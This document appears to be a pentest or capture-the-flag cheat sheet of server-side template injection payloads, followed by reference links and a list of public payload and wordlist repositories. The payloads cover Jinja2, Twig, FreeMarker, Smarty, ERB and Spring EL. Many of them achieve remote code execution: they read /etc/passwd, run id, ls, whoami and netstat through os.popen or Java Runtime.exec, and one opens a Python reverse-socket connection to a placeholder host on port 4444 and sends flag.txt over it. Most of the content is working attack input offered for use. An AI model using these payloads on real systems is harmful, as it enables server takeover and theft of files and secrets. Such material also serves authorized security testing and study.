一些payloads

{{2*2}}[[3*3]]{{3*3}}{{3*'3'}}<%= 3 * 3 %>${6*6}${{3*3}}@(6+5)#{3*3}#{ 3 * 3 }{{dump(app)}}{{app.request.server.all|join(',')}}{{config.items()}}{{ [].class.base.subclasses() }}{{''.class.mro()[1].subclasses()}}{{ ''.__class__.__mro__[2].__subclasses__() }}{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}{{'a'.toUpperCase()}} {{ request }}{{self}}<%= File.open('/etc/passwd').read %><#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}${"freemarker.template.utility.Execute"?new()("id")}{{app.request.query.filter(0,0,1024,{'options':'system'})}}{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]   ("/etc/passwd").read() }}{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}{$smarty.version}{php}echo `id`;{/php}{{['id']|filter('system')}}{{['catx20/etc/passwd']|filter('system')}}{{['cat$IFS/etc/passwd']|filter('system')}}{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}{{request|attr(["_"*2,"class","_"*2]|join)}}{{request|attr(["__","class","__"]|join)}}{{request|attr("__class__")}}{{request.__class__}}{{request|attr('application')|attr('x5fx5fglobalsx5fx5f')|attr('x5fx5fgetitemx5fx5f')('x5fx5fbuiltinsx5fx5f')|attr('x5fx5fgetitemx5fx5f')('x5fx5fimportx5f   x5f')('os')|attr('popen')('id')|attr('read')()}}{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("new java.lang.String('xxx')")}}{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder; x.command(\"whoami\"); x.start()")}}{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder; x.command(\"netstat\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder; x.command(\"uname\",\"-a\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x   ()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/cat", "flag.txt"]);'").read().zfill(417)}}{%endif%}{% endfor %}${T(java.lang.System).getenv()}${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).co   ncat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection
https://portswigger.net/research/server-side-template-injection
https://www.indusface.com/learning/application-security/server-side-template-injection/

fuzzdb - https://github.com/fuzzdb-project/fuzzdb
SecLists - https://github.com/danielmiessler/SecLists
xsuperbug - https://github.com/xsuperbug/payloads
NickSanzotta - https://github.com/NickSanzotta/BurpIntruder
7ioSecurity - https://github.com/7ioSecurity/XSS-Payloads
shadsidd - https://github.com/shadsidd
shikari1337 - https://www.shikari1337.com/list-of-xss-payloads-for-cross-site-scripting/
xmendez - https://github.com/xmendez/wfuzz
minimaxir - https://github.com/minimaxir/big-list-of-naughty-strings
xsscx - https://github.com/xsscx/Commodity-Injection-Signatures
TheRook - https://github.com/TheRook/subbrute
danielmiessler - https://github.com/danielmiessler/RobotsDisallowed
FireFart - https://github.com/FireFart/HashCollision-DOS-POC
HybrisDisaster - https://github.com/HybrisDisaster/aspHashDoS
swisskyrepo - https://github.com/swisskyrepo/PayloadsAllTheThings
1N3 - https://github.com/1N3/IntruderPayloads
cujanovic - https://github.com/cujanovic/Open-Redirect-Payloads
cujanovic - https://github.com/cujanovic/Content-Bruteforcing-Wordlist
cujanovic - https://github.com/cujanovic/subdomain-bruteforce-list
cujanovic - https://github.com/cujanovic/CRLF-Injection-Payloads
cujanovic - https://github.com/cujanovic/Virtual-host-wordlist
cujanovic - https://github.com/cujanovic/dirsearch-wordlist
lavalamp- - https://github.com/lavalamp-/password-lists
arnaudsoullie - https://github.com/arnaudsoullie/ics-default-passwords
scadastrangelove - https://github.com/scadastrangelove/SCADAPASS
jeanphorn - https://github.com/jeanphorn/wordlist
j3ers3 - https://github.com/j3ers3/PassList
nyxxxie - https://github.com/nyxxxie/awesome-default-passwords
foospidy - https://github.com/foospidy/web-cve-tests

dirbuster - https://www.owasp.org/index.php/DirBuster
fuzzing_code_database - https://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database
JBroFuzz - https://www.owasp.org/index.php/JBroFuzz

xss/ismailtasdelen.txt - https://github.com/ismailtasdelen/xss-payload-list
xss/jsf__k.txt - http://www.jsfuck.com/
xss/kirankarnad.txt - https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester
xss/packetstorm.txt - https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html
xss/smeegessec.com.txt - http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html
xss/d3adend.org.txt - http://d3adend.org/xss/ghettoBypass
xss/soaj1664ashar.txt - http://pastebin.com/u6FY1xDA
xss/billsempf.txt - https://www.sempf.net/post/Six-hundred-and-sixty-six-XSS-vectors-suitable-for-attacking-an-API.aspx (http://pastebin.com/48WdZR6L)
xss/787373.txt - https://84692bb0df6f30fc0687-25dde2f20b8e8c1bda75aeb96f737eae.ssl.cf1.rackcdn.com/--xss.html
xss/bhandarkar.txt - http://hackingforsecurity.blogspot.com/2013/11/xss-cheat-sheet-huge-list.html
xss/xssdb.txt - http://xssdb.net/xssdb.txt
xss/0xsobky.txt - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
xss/secgeek.txt - https://www.secgeek.net/solutions-for-xss-waf-challenge/
xss/reddit_xss_get.txt - All XSS GET requests from https://www.reddit.com/r/xss (as of 3/30/2016)
xss/rafaybaloch.txt - http://www.rafayhackingarticles.net/2016/09/breaking-great-wall-of-web-xss-waf.html
xss/alternume0.txt - https://www.openbugbounty.org/reports/722726/
xss/XssPayloads - https://twitter.com/XssPayloads
sqli/camoufl4g3.txt - https://github.com/camoufl4g3/SQLi-payload-Fuzz3R/blob/master/payloads.txt
sqli/c0rni3sm.txt - http://c0rni3sm.blogspot.in/2016/02/a-quite-rare-mssql-injection.html
sqli/sqlifuzzer.txt - https://github.com/ContactLeft/sqlifuzzer/tree/master/payloads
sqli/harisec.txt - https://hackerone.com/reports/297478
sqli/jstnkndy.txt - https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/
sqli/d0znpp.txt - https://medium.com/@d0znpp/how-to-bypass-libinjection-in-many-waf-ngwaf-1e2513453c0f
sqli/libinjection-bypasses.txt - https://gist.github.com/migolovanov/432fe28c8c7e9fa675ab3903c5eda77f
traversal/dotdotpwn.txt - https://github.com/wireghoul/dotdotpwn
codeinjection/fede.txt - https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/
commandinjection/ismailtasdelen-unix.txt - https://github.com/ismailtasdelen/command-injection-payload-list
commandinjection/ismailtasdelen-windows.txt - https://github.com/ismailtasdelen/command-injection-payload-list

maccdc2010.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC
maccdc2011.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC
maccdc2012.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC
ists12_2015.txt - Information Security Talent Search (http://ists.sparsa.org/), source: http://www.netresec.com/?page=ISTS
defcon20.txt - DEFCON Capture the Flag (https://www.defcon.org/html/links/dc-ctf.html), source: http://www.netresec.com/?page=PcapFiles

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
http://htmlpurifier.org/live/smoketests/xssAttacks.php